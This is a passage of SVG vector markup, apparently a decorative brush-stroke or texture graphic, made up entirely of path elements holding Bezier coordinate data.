d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2